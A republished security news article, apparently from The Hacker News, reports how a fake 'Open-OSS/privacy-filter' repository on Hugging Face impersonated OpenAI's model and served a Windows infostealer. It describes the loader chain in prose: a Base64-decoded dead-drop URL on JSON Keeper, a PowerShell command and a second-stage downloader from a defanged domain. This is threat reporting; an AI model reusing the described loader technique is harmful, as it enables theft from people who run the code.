Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads

Staff Editor 2026-05-11
Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads

Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads

https://thehackernews.com/2026/05/fake-openai-privacy-filter-repo-hits-1.html

Publish Date: 2026-05-11 03:05:00

Source Domain: thehackernews.com

Ravie LakshmananMay 11, 2026Supply Chain Attack / Threat Intelligence

A malicious Hugging Face repository managed to take a spot in the platform’s trending list by impersonating OpenAI’s Privacy Filter open-weight model to deliver a Rust-based information stealer to Windows users.

The project, named Open-OSS/privacy-filter, masqueraded as its legitimate counterpart, released by OpenAI late last month (openai/privacy-filter), including copying the entire description verbatim to trick unsuspecting users into downloading it.Access to the malicious model has since been disabled by Hugging Face.

Privacy Filter was unveiled in April 2026 by the artificial intelligence (AI) company as a way to detect and redact personally identifiable information (PII) in unstructured text with an aim to incorporate strong privacy and security protections into applications.

“The repository had typosquatted OpenAI’s legitimate Privacy Filter release, copied its model card nearly verbatim, and shipped a loader.py file that fetches and executes infostealer malware on Windows machines,” the HiddenLayer Research Team said in a report published last week.

The malicious project instructs users to clone the repository and run a batch script (“start.bat”) for Windows or a Python script (“loader.py”) for Linux or macOS systems to configure all necessary dependencies and start the model.

Once launched, the Python script triggers malicious code responsible for disabling SSL verification, decoding a Base64-encoded URL hosted on JSON Keeper, and using it to extract a command that’s passed to PowerShell for subsequent execution.The use of JSON Keeper, a public JSON paste service, as a dead drop resolver allows the attackers to switch payloads on the fly without the need for modifying the repository.

The PowerShell command is used to download a batch script from a remote server (“api.eth-fastscan[.]org”) and launch it using “cmd.exe.”The batch script functions as a second-stage downloader…

Source

More Stories

Prince Harry Did a Total 180 About His & Meghan Markle’s Kids Privacy

Prince Harry Did a Total 180 About His & Meghan Markle’s Kids Privacy

Staff Editor 2026-06-06
Brave Origin strips AI, Rewards, and VPN for privacy purists

Brave Origin strips AI, Rewards, and VPN for privacy purists

Staff Editor 2026-06-06
X-VPN Announces Successful Completion of Independent No-Logs Audit, Strengthening User Privacy and Transparency

X-VPN Announces Successful Completion of Independent No-Logs Audit, Strengthening User Privacy and Transparency

Staff Editor 2026-06-06

Terms and Conditions - Privacy Policy